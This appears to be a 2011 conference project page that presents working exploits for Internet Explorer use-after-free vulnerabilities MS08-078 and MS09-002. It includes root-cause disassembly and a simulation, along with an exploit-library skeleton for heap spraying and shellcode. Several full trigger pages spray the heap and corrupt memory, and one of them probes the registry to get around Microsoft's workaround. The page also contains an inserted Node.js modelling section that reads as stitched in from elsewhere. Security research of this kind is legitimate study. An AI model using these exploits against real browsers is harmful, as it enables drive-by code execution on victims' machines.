Last update: Fri Dec 23 10:47:23 BRST 2011.
/*
 * $Id: h2hc-2011-nbrito-inception 1.0 2011/10/21 20:22:15 nbrito Exp $
 *
 * Talk: Inception - The extended edition
 * Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
 * Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
 */
Table of Contents
Inception @ H2HC 8th Edition
Inception: The Extended Edition
Please refer to SlideShare for the slide deck. The demonstration videos are:
The following trigger is based on RSnake's extraordinary document:
<!--
Talk: Inception - The extended edition
Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
-->
<HTML>
  <SCRIPT LANGUAGE="JavaScript">
    function Inception (){
      document.getElementById("b00m").innerHTML =
        "<XML ID=I>" +
        "<X>" +
        "<C>" +
        "<IMG SRC=\"javascript:alert('XSS')\">" +
        "</C>" +
        "</X>" +
        "</XML>" +
        "<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>" +
        "<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>" +
        "</MARQUEE>" +
        "</MARQUEE>";
    }
  </SCRIPT>
  <BODY onLoad="Inception();">
    <DIV ID="b00m" STYLE="display: none;">
    </DIV>
  </BODY>
</HTML>
MS08-078 Root Cause
Disassembled
[...]
mov edi,ecx                          ; ecx = array
mov esi,dword ptr [edi+8]            ; edi+08h = array length
xor ebx,ebx                          ; ebx = 0 -> object counter
shr esi,2                            ; esi >> 2 = array members
dec esi                              ; esi = esi - 1 = array member object counter index
mov dword ptr [ebp-4],ebx            ; keep the object counter value in memory (ebp)
js stop_loop                         ; if the result of this operation is negative
                                     ;   then exit the loop
                                     ;   else keep going
start_loop:                          ; this is where the loop starts
mov eax,dword ptr [edi+0Ch]          ; eax = current object pointer in the array
cmp dword ptr [eax+ebx*4],0          ; check if the current object pointer exists
je increment_counter                 ; if the current object no longer exists
                                     ;   then increment the object counter
                                     ;   else keep going
mov ecx,dword ptr [eax+ebx*4]        ; ecx = current object pointer
                                     ; then call CXfer::TransferFromSrc
call mshtml!CXfer::TransferFromSrc (7ea81cc0)
test eax,eax                         ; what is the current object pointer?
je increment_counter                 ; if the current object pointer has been changed
                                     ;   then increment the object counter
                                     ;   else keep going
[...]
increment_counter:
inc ebx                              ; increment the object counter
cmp ebx,esi                          ; compare array member object counter index and object counter
jle start_loop                       ; if the object counter is less than or equal to the object counter index
                                     ;   then return to the loop
                                     ;   else keep going
stop_loop:                           ; this is where the loop stops
mov eax,dword ptr [ebp-4]
[...]
ret
Reverse engineered
[...]
esi = ((dword ptr [edi+8]) >> 2) - 1;
ebx = 0;
do{
  eax = dword ptr [edi+12];
  ecx = dword ptr [eax+ebx*4];
  if(!(ecx)) break;
  ecx->mshtml!CXfer::TransferFromSrc();
  [...]
  ebx++;
}while(ebx <= esi);
[...]
Simulation code (HTML)
To help you understand the root cause of this vulnerability, the following JavaScript simulates the problem. NOTE: THIS IS SIMULATION CODE ONLY.
<!--
Talk: Inception - The extended edition
Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
-->
<HTML>
  <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
    /* This is simulation code only. */
    var bug = true;
    var control = true;
    var patch = false;
    var edi = [8, ["0x12345678", "0x87654321"]];
    var eax = "";
    var ecx = "";
    alert(
      "BUG simulation mode:\t" + (bug ? "ON" : "OFF") + "\n" +
      "CONTROL simulation mode:\t" + (control ? "ON" : "OFF") + "\n" +
      "PATCH simulation mode:\t" + (patch ? "ON" : "OFF")
    );
    function mshtmlCRecordInstanceTransferToDestination(){
      var esi = (edi[0] >> 2) - 1;
      var ebx = 0;
      do{
        eax = edi[1][ebx];
        ecx = eax;
        if(esi != ((edi[0] >> 2) - 1))
          alert("[1] mshtml!CRecordInstance::TransferToDestination():\n\t*WARNING* \'([edi+08h] >> 2) - 1\' = \'" + parseInt((edi[0] >> 2) - 1) + "\'");
        if(ecx == "")
          break;
        if(patch){
          /* Fixing the code: re-derive the bound from the current array length. */
          eax = (edi[0] >> 2) - 1;
          if(eax <= ebx){
            alert("[1] mshtml!CRecordInstance::TransferToDestination():\n\t*PATCHED* \'eax\' = \'([edi+08h] >> 2) - 1\' = \'" + parseInt((edi[0] >> 2) - 1) + "\'");
            break;
          }
        }
        mshtmlCXferTransferFromSrc();
        ebx++;
      }while(ebx <= esi);
    }
    function mshtmlCXferTransferFromSrc(){
      if(ecx == "0x12345678"){
        alert("[2] mshtml!CXfer::TransferFromSrc():\n\t\'ecx\' = " + ecx);
      }else if(ecx == "Freed Memory"){
        alert("[2] mshtml!CXfer::TransferFromSrc():\n\t\'ecx\' = " + ecx);
        return(true);
      }else if(ecx == "0x0a0a0a0a"){
        alert("[2] mshtml!CXfer::TransferFromSrc():\n\t\'HEAP SHELLCODE\' @ " + ecx);
        return(true);
      }
      if(bug)
        mshtmlCRecordInstanceRemoveBinding();
      if(bug && control)
        ole32ComPs_NdrDllCanUnloadNow();
    }
    function mshtmlCRecordInstanceRemoveBinding(){
      /* The array is released while the loop above still holds its old bound. */
      edi = [8, ["Freed Memory", "Freed Memory"]];
      alert("[3] mshtml!CRecordInstance::RemoveBinding():\n\t\'ntdll!RtlFreeHeap()\'");
    }
    function ole32ComPs_NdrDllCanUnloadNow(){
      /* A smaller allocation reuses the freed block. */
      edi = [4, ["0x0a0a0a0a", "0x0a0a0a0a"]];
      alert("[4] ole32!ComPs_NdrDllCanUnloadNow():\n\t\'ntdll!RtlAllocateHeap()\'");
    }
  </SCRIPT>
  <BODY onLoad="mshtmlCRecordInstanceTransferToDestination();">
  </BODY>
</HTML>
CVE-2008-4844 Description
After three years, the CVE Editorial Board decided to change the description of CVE-2008-4844 based on this research. As a direct result, CVE-2008-4844 is now much more accurate than before. Check for yourself:
Previous description
Current description
Recommended description
As you may remember, I have suggested the following description:
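To make the root-cause loop from the MS08-078 Root Cause section concrete outside a browser, here is an added example that is not part of the original page or of the Exploit Library: a Node.js model of the TransferToDestination loop, with the cached-bound form beside a form that re-derives the bound on every iteration. Everything in it (makeArray, rebindSmaller, transferCachedBound, transferRecheckedBound, the trace format and the inputs) is a constructed stand-in, not an mshtml symbol.

```javascript
// Added example, not code from the original page or its ExploitLib: a
// runnable (Node.js) model of the TransferToDestination loop. `lengthBytes`
// stands in for [edi+08h] and `items` for the pointer table at [edi+0Ch].
// All names below are assumptions for this simulation, not mshtml symbols.

// A member array as the loop sees it. `items` is deliberately allowed to be
// longer than lengthBytes / 4 so that an index past the declared bound reads
// "whatever follows the chunk", as it would on a real heap.
function makeArray(lengthBytes, items) {
  return { lengthBytes: lengthBytes, items: items.slice() };
}

// Models the callee side effect the page attributes to RemoveBinding(): the
// holder's array is released and the slot is reused by a smaller allocation,
// so the bound that was valid on entry is now stale.
function rebindSmaller(holder) {
  holder.array = makeArray(4, ["reused0", "reused1"]);
}

// Vulnerable shape of the loop: esi is derived from [edi+08h] once, before
// the loop, and never revisited even though onItem() may replace the array.
function transferCachedBound(holder, onItem) {
  const esi = (holder.array.lengthBytes >> 2) - 1;   // shr esi,2 ; dec esi
  const trace = [];
  if (esi < 0) return trace;                         // js stop_loop
  let ebx = 0;                                       // xor ebx,ebx
  do {
    const current = (holder.array.lengthBytes >> 2) - 1; // the bound as it is *now*
    const ecx = holder.array.items[ebx];             // mov ecx,[eax+ebx*4]
    if (ecx != null) {                               // cmp [eax+ebx*4],0 ; je
      trace.push({ index: ebx, value: ecx,
                   status: ebx > current ? "PAST_CURRENT_BOUND" : "OK" });
      onItem(holder, ecx);                           // call CXfer::TransferFromSrc
    }
    ebx++;                                           // inc ebx
  } while (ebx <= esi);                              // cmp ebx,esi ; jle start_loop
  return trace;
}

// Hardened shape: the bound is re-derived from the array's current length on
// every iteration, so a reallocation inside the callee ends the loop instead
// of being indexed with the stale bound.
function transferRecheckedBound(holder, onItem) {
  const trace = [];
  for (let ebx = 0; ebx <= (holder.array.lengthBytes >> 2) - 1; ebx++) {
    const ecx = holder.array.items[ebx];
    if (ecx == null) continue;
    trace.push({ index: ebx, value: ecx, status: "OK" });
    onItem(holder, ecx);
  }
  return trace;
}

// Constructed scenario: a two-entry array (8 bytes of pointers) whose first
// transfer triggers the rebind, exactly once.
function runScenario(transfer) {
  const holder = { array: makeArray(8, ["obj0", "obj1"]) };
  let rebound = false;
  return transfer(holder, function (h) {
    if (!rebound) { rebound = true; rebindSmaller(h); }
  });
}

console.log("cached bound   :", JSON.stringify(runScenario(transferCachedBound)));
console.log("rechecked bound:", JSON.stringify(runScenario(transferRecheckedBound)));
```

Run it with node: the first trace shows the cached-bound loop visiting index 1 after the callee has rebound the array, marked PAST_CURRENT_BOUND because the re-derived bound is now 0; this is the stale-length condition the page's simulation flags with its WARNING alert. The second trace stops after the first entry. Note that the stop condition here is index greater than the re-derived bound, whereas the page's simulated patch breaks as soon as the re-derived bound is less than or equal to the index.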
Exploit Library
A JavaScript library (containing object properties and object methods) has been created to optimize the exploitation. This library is inspired by:
Literal Object Namespacing (a.k.a. Beta)
/*
* $Id: ExploitLib.js 1.1 2011/10/21 19:58:48 nbrito Exp $
*
* Talk: Inception - The extended edition
* Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
* Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
*/
/**************************************************************************
* .___ __ .__ *
* | | ____ ____ ____ _______/ |_|__| ____ ____ *
* | |/ \_/ ___\/ __ \\____ \ __\ |/ _ \ / \ *
* | | | \ \__\ ___/| |_> > | | ( <_> ) | \ *
* |___|___|__/\_____>_____> __/|__| |__|\____/|___|__/ *
* |__| *
* _______________ ____ ____ *
* \_____ \ _ \/_ /_ | *
* / ____/ /_\ \| || | *
* / \ \_/ \ || | *
* \________\_______/___||___| *
* *
* http://code.google.com/p/inception-h2hc/ *
**************************************************************************
* Pieces of this JavaScript code have been taken from:
* 1. "Heap Feng Shui in JavaScript" (a.k.a. heapLib.js):
* - Author: Alexander Sotirov
* - Reference: http://mcaf.ee/fsyxt
* http://mcaf.ee/fxow1
*
* 2. "PwnZilla 5 - Exploit for IDN host name heap buffer overrun":
* - Author: Berend-Jan Wever
* - Reference: http://mcaf.ee/xeydq
*
* 3. "How to impress girls with browser memory protection bypasses":
* - Author: Alexander Sotirov and Mark Dowd
* - Reference: http://mcaf.ee/mpu7f
* http://mcaf.ee/7mewi
*
***************************************************************************
Copyright (c) 2011 Nelson Brito. All rights reserved worldwide.
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
***************************************************************************/
/* This JavaScript uses "Literal Object Namespacing". */
Exploit = function (){
  [...]
  return{
    code:
      [
        [...]
      ],
    detail:
      [],
    message:
      true,
    offset:
      [],
    rop:
      false,
    address:
      function (address, format){
        [...]
      },
    address2:
      function (address, format){
        [...]
      },
    ascii:
      function (method, format, size){
        [...]
      },
    banner:
      function (memory){
        [...]
      },
    check:
      function (address, shellcode, memory){
        [...]
      },
    chunk1mb:
      function (block64k){
        [...]
      },
    chunk64k:
      function (address, shellcode){
        [...]
      },
    even:
      function (shellcode){
        [...]
      },
    heap:
      function (block1mb, memory){
        [...]
      },
    hexa:
      function (address, size){
        [...]
      },
    memory:
      function (address, size){
        [...]
      },
    random:
      function (maximum){
        [...]
      },
    shellcode:
      function (shellcode, format){
        [...]
      },
    spray:
      function (address, shellcode, memory){
        [...]
      }
  };
};
Single Object Namespacing (a.k.a. Alpha)
/*
* $Id: ExploitLib-alpha.js 1.1 2011/10/21 19:41:48 nbrito Exp $
*
* Talk: Inception - The extended edition
* Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
* Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
*/
/**************************************************************************
* .___ __ .__ *
* | | ____ ____ ____ _______/ |_|__| ____ ____ *
* | |/ \_/ ___\/ __ \\____ \ __\ |/ _ \ / \ *
* | | | \ \__\ ___/| |_> > | | ( <_> ) | \ *
* |___|___|__/\_____>_____> __/|__| |__|\____/|___|__/ *
* |__| *
* _______________ ____ ____ *
* \_____ \ _ \/_ /_ | *
* / ____/ /_\ \| || | *
* / \ \_/ \ || | *
* \________\_______/___||___| *
* *
* http://code.google.com/p/inception-h2hc/ *
**************************************************************************
* Pieces of this JavaScript code have been taken from:
* 1. "Heap Feng Shui in JavaScript" (a.k.a. heapLib.js):
* - Author: Alexander Sotirov
* - Reference: http://mcaf.ee/fsyxt
* http://mcaf.ee/fxow1
*
* 2. "PwnZilla 5 - Exploit for IDN host name heap buffer overrun":
* - Author: Berend-Jan Wever
* - Reference: http://mcaf.ee/xeydq
*
* 3. "How to impress girls with browser memory protection bypasses":
* - Author: Alexander Sotirov and Mark Dowd
* - Reference: http://mcaf.ee/mpu7f
* http://mcaf.ee/7mewi
*
***************************************************************************
Copyright (c) 2011 Nelson Brito. All rights reserved worldwide.
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
***************************************************************************/
/* This JavaScript uses "Single Object Namespacing". */
Exploit.prototype.constructor = function Exploit (){
  [...]
  this.code = new Array(
    [...]
  );
  this.detail = new Array();
  this.message = new Boolean(true);
  this.offset = new Array();
  this.rop = new Boolean(false);
}
Exploit.prototype.address = function (address, format){
  [...]
}
Exploit.prototype.address2 = function (address, format){
  [...]
}
Exploit.prototype.ascii = function (method, format, size){
  [...]
}
Exploit.prototype.banner = function (memory){
  [...]
}
Exploit.prototype.check = function (address, shellcode, memory){
  [...]
}
Exploit.prototype.chunk1mb = function (block64k){
  [...]
}
Exploit.prototype.chunk64k = function (address, shellcode){
  [...]
}
Exploit.prototype.even = function (shellcode){
  [...]
}
Exploit.prototype.heap = function (block1mb, memory){
  [...]
}
Exploit.prototype.hexa = function (address, size){
  [...]
}
Exploit.prototype.memory = function (address, align){
  [...]
}
Exploit.prototype.random = function (maximum){
  [...]
}
Exploit.prototype.shellcode = function (shellcode, format){
  [...]
}
Exploit.prototype.spray = function (address, shellcode, memory){
  [...]
}
MS08-078 + Exploit Library
<!--
Talk: Inception - The extended edition
Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
-->
<HTML>
  <SCRIPT SRC="./ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
  <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
    /*
     * Reliable trigger and exploitation tested on:
     * - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
     * - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
     * - Microsoft Windows Server 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
     * - Microsoft Internet Explorer 7 (Version 7.0.6001.18000)
     * - Microsoft Windows Vista Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
     * - Microsoft Windows Server 2008 Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
     */
    function Inception (){
      var ms08_078 = new Exploit(),
          choice = new Number(),
          memory = new Number(),
          address = new Number(),
          shellcode = new String(),
          trigger = new String();
      ms08_078.detail = [ "MS08-078", "0.01", "20111015", "Nelson Brito" ];
      ms08_078.offset = [ 0x0a0a0a0a ];
      ms08_078.message = false;
      choice = ms08_078.random(ms08_078.offset.length);
      memory = ms08_078.memory(ms08_078.offset[choice], 16);
      address = ms08_078.address(ms08_078.offset[choice], 0);
      shellcode = ms08_078.shellcode(ms08_078.code[1], 1);
      if(!(ms08_078.spray(ms08_078.address(0x00000000, 0), ms08_078.address(0x00000000, 0), memory))){
        alert("Inception(): Heap memory defragmentation failed!");
        CollectGarbage();
        window.location.replace("about:blank");
      }
      trigger = trigger.concat("<XML ID=I><X><C><IMG SRC=\"javascript:");
      trigger = trigger.concat(ms08_078.address(ms08_078.offset[choice], 2));
      trigger = trigger.concat("ert('XSS')\"></C></X></XML>");
      trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
      trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
      trigger = trigger.concat("</MARQUEE></MARQUEE>");
      if(ms08_078.spray(address, shellcode, memory))
        document.getElementById("b00m").innerHTML = trigger;
    }
  </SCRIPT>
  <BODY onLoad="Inception();">
    <DIV ID="b00m" STYLE="display: none;">
    </DIV>
  </BODY>
</HTML>
BONUS
MS08-078 Universal Trigger
This trigger is based on the Microsoft sample for "Binding HTML Elements to Data":
NOTE: THIS TRIGGER WORKS ON MICROSOFT INTERNET EXPLORER 6, BUT CRASHES IN A DIFFERENT MEMORY REGION.
<!--
Talk: Inception - The extended edition
Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
-->
<HTML>
  <SCRIPT SRC="../ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
  <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
    /*
     * Reliable trigger and exploitation tested on:
     * - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
     * - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
     * - Microsoft Windows Server 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
     */
    function Inception (){
      var ms08_078 = new Exploit(),
          choice = new Number(),
          memory = new Number(),
          address = new Number(),
          shellcode = new String(),
          trigger = new String();
      ms08_078.detail = ["MS08-078", "0.01", "20111015", "Nelson Brito"];
      ms08_078.offset = [ 0x12345678 ];
      ms08_078.message = false;
      choice = ms08_078.random(ms08_078.offset.length);
      memory = ms08_078.memory(ms08_078.offset[choice]);
      address = ms08_078.address(ms08_078.offset[choice], 0);
      shellcode = ms08_078.shellcode(ms08_078.code[1], 1);
      /*
       * This trigger is based on the Microsoft sample for "Binding HTML Elements to Data":
       * - http://samples.msdn.microsoft.com/workshop/samples/author/databind/dbanchor.htm
       *
       * Debugging output:
       * mshtml!CXfer::TransferFromSrc+0x38:
       * 7ea81cf8 ff9184000000 call dword ptr [ecx+84h] ds:0023:7620b2d8=08468bff
       * 0:005> g
       * (bc.e34): Access violation - code c0000005 (first chance)
       * First chance exceptions are reported before any exception handling.
       * This exception may be expected and handled.
       * eax=76203520 ebx=00000000 ecx=7620b254 edx=7e90876d esi=02299cd0 edi=00190cd8
       * eip=08468bff esp=01e8fc94 ebp=01e8fcc0 iopl=0 nv up ei pl nz na pe nc
       * cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
       * 08468bff ?? ???
       *
       * Using this trigger the exploit does not even need to overwrite the return address,
       * because the code already crashes in the heap (08468bff). It just demands the heap
       * spraying an amount of memory larger than 132 MB.
       *
       * If you do not believe me, try the following settings:
       * - ms08_078.offset = [0x90909090];
       * - memory = 133;
       */
      trigger = trigger.concat("<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\" ID=\"tdcLinks\" HEIGHT=0 WIDTH=0>");
      trigger = trigger.concat("<PARAM NAME=\"DataURL\" VALUE=\"links.csv\">");
      trigger = trigger.concat("<PARAM NAME=\"UseHeader\" VALUE=\"True\">");
      trigger = trigger.concat("</OBJECT>");
      trigger = trigger.concat("<A DATASRC=\"#tdcLinks\" DATAFLD=\"link_href\">");
      trigger = trigger.concat("<SPAN DATASRC=\"#tdcLinks\" DATAFLD=\"link_friendly\">");
      trigger = trigger.concat("<SPAN DATASRC=\"#tdcLinks\" DATAFLD=\"link_friendly\">");
      trigger = trigger.concat("</SPAN></SPAN>");
      trigger = trigger.concat("</A>");
      if(ms08_078.spray(address, shellcode, memory))
        document.getElementById("b00m").innerHTML = trigger;
    }
    /*
     * Adjust the 'setTimeout' for your convenience, because the second loading
     * is the one which triggers the vulnerability.
     */
    setTimeout('window.location.reload(true);', 2000);
  </SCRIPT>
  <BODY onLoad="Inception()">
    <DIV ID="b00m" STYLE="display: none;">
    </DIV>
  </BODY>
</HTML>
MS08-078 Automated Exploitation (a.k.a. Bypassing Workaround)
This trigger attempts to check whether the Microsoft workaround "Disable XML Island functionality" has been applied.
<!--
Talk: Inception - The extended edition
Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
-->
<HTML>
  <LINK REL="stylesheet" HREF="./samples.css" TYPE="text/css">
  <STYLE>
    a:hover{
      color:red;
    }
  </STYLE>
  <HEAD>
    <TITLE> Permutation Oriented Programming </TITLE>
    <LINK REL="icon" TYPE="image/ico" HREF="favicon.ico"/>
    <META HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8"/>
    <META HTTP-EQUIV="content-style-type" CONTENT="text/css"/>
    <META NAME="author" CONTENT="Nelson Brito"/>
    <META NAME="copyright" CONTENT="2004-2011 Nelson Brito"/>
    <META NAME="description" CONTENT="Permutation Oriented Programming"/>
    <META NAME="keywords" CONTENT="Permutation Oriented Programming"/>
  </HEAD>
  <SCRIPT SRC="../../ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
  <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
    /*
     * Reliable trigger and exploitation tested on:
     * - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
     * - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
     * - Microsoft Windows Server 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
     * - Microsoft Internet Explorer 7 (Version 7.0.6001.18000)
     * - Microsoft Windows Vista Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
     * - Microsoft Windows Server 2008 Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
     */
    function Inception (){
      var ms08_078 = new Exploit(),
          choice = new Number(),
          memory = new Number(),
          address = new Number(),
          shellcode = new String(),
          trigger = new String();
      var classid = new Array(
            "550DDA30-0541-11D2-9CA9-0060B0EC3D39", /* XML Data Source Object 1.0 */
            "F5078F39-C551-11D3-89B9-0000F81FE221", /* XML Data Source Object 3.0 */
            "F6D90F14-9C73-11D3-B32E-00C04F990BB4"  /* XML Data Source Object 3.0 */
          ),
          automation = new Boolean(false),
          wshell,
          hkey = "HKCR\\CLSID\\{379E501F-B231-11D1-ADC1-00805FC752D8}\\";
      ms08_078.detail = ["MS08-078", "0.01", "20111015", "Nelson Brito"];
      ms08_078.offset = [ 0x0a0a0a0a ];
      ms08_078.message = false;
      choice = ms08_078.random(ms08_078.offset.length);
      memory = ms08_078.memory(ms08_078.offset[choice]);
      address = ms08_078.address(ms08_078.offset[choice], 0);
      shellcode = ms08_078.shellcode(ms08_078.code[2], 1);
      try{
        wshell = new ActiveXObject("WScript.Shell");
        automation = true;
      }catch(error){
        document.getElementById("message").innerHTML = "AUTOMATION FAILED";
        automation = false;
      }
      if(automation){
        /* The workaround (KB961051) removes this CLSID; a failed read means it has been applied. */
        try{
          wshell.RegRead(hkey);
          document.getElementById("message").innerHTML = "NOT APPLIED";
        }catch(error){
          document.getElementById("message").innerHTML = "APPLIED";
          automation = false;
        }
      }
      if(automation){
        trigger = trigger.concat("<XML ID=I><X><C>");
        trigger = trigger.concat("<![CDATA[<IMG SRC=\"javascript:" + ms08_078.address(ms08_078.offset[choice], 2) + "ert((\'XSS\')\">]]>");
        trigger = trigger.concat("</C></X></XML>");
      }else{
        trigger = trigger.concat("<OBJECT CLASSID=\"clsid:" + classid[ms08_078.random(classid.length)] + "\" ID=I><X><C>");
        trigger = trigger.concat("<![CDATA[<IMG SRC=\"javascript:" + ms08_078.address(ms08_078.offset[choice], 2) + "ert((\'XSS\')\">]]>");
        trigger = trigger.concat("</C></X></OBJECT>");
      }
      trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
      trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
      trigger = trigger.concat("</MARQUEE></MARQUEE>");
      if(ms08_078.spray(address, shellcode, memory))
        document.getElementById("b00m").innerHTML = trigger;
    }
  </SCRIPT>
  <BODY>
    <DIV CLASS="body">
      <H1>Hackers to Hackers Conference 8<SUP>th</SUP> Edition -- Inception Demonstration</H1>
      <TABLE>
        <THEAD>
          <TR>
            <TH COLSPAN=2>"Disable XML Island functionality" (KB961051)</TH>
          </TR>
        </THEAD>
        <TBODY>
          <TR>
            <TD>Workaround:</TD>
            <TD><DIV CLASS="inception" ID="message"></DIV></TD>
          </TR>
          <TR>
            <TD COLSPAN=2><INPUT TYPE=BUTTON VALUE="INCEPTION" onClick="Inception();"></TD>
          </TR>
        </TBODY>
      </TABLE>
      <DIV ID="b00m" STYLE="display: none;"></DIV>
      <P CLASS="viewsource">[Click on "INCEPTION" to automate the MS08-078 vulnerability exploitation]</P>
      <A CLASS="copyright" HREF="http://code.google.com/p/permutation-oriented-programming/">Permutation Oriented Programming</A>
      <BR/>
      <A CLASS="copyright" HREF="http://about.me/nbrito">©2004-2011 Nelson Brito. All rights reserved worldwide.</A>
    </DIV>
  </BODY>
</HTML>
MS09-002 + Exploit Library
Here is another example, using the Exploit Library, for MS09-002. This example uses a correct approach, i.e. document.createElement() and document.createAttribute(), with a single loop to overwrite the freed memory allocation.
<!--
Talk: Inception - The extended edition
Author: Nelson Brito <nbrito *NoSPAM* sekure.org>
Conference: Hackers to Hackers Conference Eighth Edition (October 2011)
-->
<HTML>
  <SCRIPT SRC="../ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
  <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
    /*
     * Reliable trigger and exploitation tested on:
     * - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
     * - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
     * - Microsoft Windows Server 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
     * - Microsoft Internet Explorer 7 (Version 7.0.6001.18000)
     * - Microsoft Windows Vista Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
     * - Microsoft Windows Server 2008 Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
     */
    function Inception (){
      var ms09_002 = new Exploit(),
          choice = new Number(),
          memory = new Number(),
          address = new Number(),
          shellcode = new String(),
          __01 = document.createElement("option"),
          __02, __03 = [ ["image", "src" ], ["area", "href"], ["link", "href"] ],
          __04, __05,
          __06 = new Array();
      ms09_002.detail = ["MS09-002", "0.01", "20111016", "Nelson Brito"];
      ms09_002.offset = [
        0x06060606, 0x08080808, 0x0c0c0c0c, 0x0e0e0e0e,
        0x10101010, 0x14141414, 0x15151515, 0x16161616,
        0x18181818, 0x20202020, 0x24242424, 0x27272727,
        0x28282828, 0x30303030
      ];
      ms09_002.message = false;
      choice = ms09_002.random(ms09_002.offset.length);
      memory = ms09_002.memory(ms09_002.offset[choice], 16);
      address = ms09_002.address(ms09_002.offset[choice], 0);
      shellcode = ms09_002.shellcode(ms09_002.code[1], 1);
      __01.componentFromPoint;
      __02 = __01.cloneNode();
      __01.clearAttributes();
      __01 = null;
      CollectGarbage();
      choice = ms09_002.random(__03.length);
      __04 = document.createElement(__03[choice][0]);
      __05 = document.createAttribute(__03[choice][1]);
      __05.nodeValue = unescape(address + ms09_002.ascii("mixed", "ascii", (32 - (__03[choice][0].length + __03[choice][1].length))));
      __04.setAttributeNode(__05);
      for(var i = 0 ; i < (1024 - (__03[choice][0].length + __03[choice][1].length)) ; i++)
        __06.push(__04);
      if(ms09_002.spray(address, shellcode, memory))
        __02.componentFromPoint;
    }
  </SCRIPT>
  <BODY onLoad="Inception();">
  </BODY>
</HTML>
References
Disclaimer
This Google Project Hosting is provided to you "AS IS". While the project owner makes every effort to ensure that the contents of this Google Project Hosting are accurate and complete, he makes no representation or warranty, whether express or implied, as to the operation, integrity, availability or functionality of this Google Project Hosting or as to the accuracy, completeness or reliability of any information on this Google Project Hosting. Any person who accesses this Google Project Hosting or relies on this Google Project Hosting or on the information contained in this Google Project Hosting does so at their own risk. The project owner also makes no warranty or representation, whether express or implied, that the information or files available on this Google Project Hosting are free of viruses, destructive materials or any other data or code which is able to corrupt, compromise or jeopardise the operation or content of a computer system, computer network or your hardware or software. You accept all risk associated with the existence of such viruses, destructive materials or any other data or code which is able to corrupt, compromise or jeopardise the operation or content of a computer system, computer network or your hardware or software. The project owner does not accept any responsibility for any errors or omissions on this Google Project Hosting, and all information, documents and codes provided on this Google Project Hosting are for educational purposes only!
"Be aware that the contents of this Google Project Hosting may be forbidden by some countries. VIEWER DISCRETION IS ADVISED!"
©2011 Nelson Brito. All rights reserved worldwide.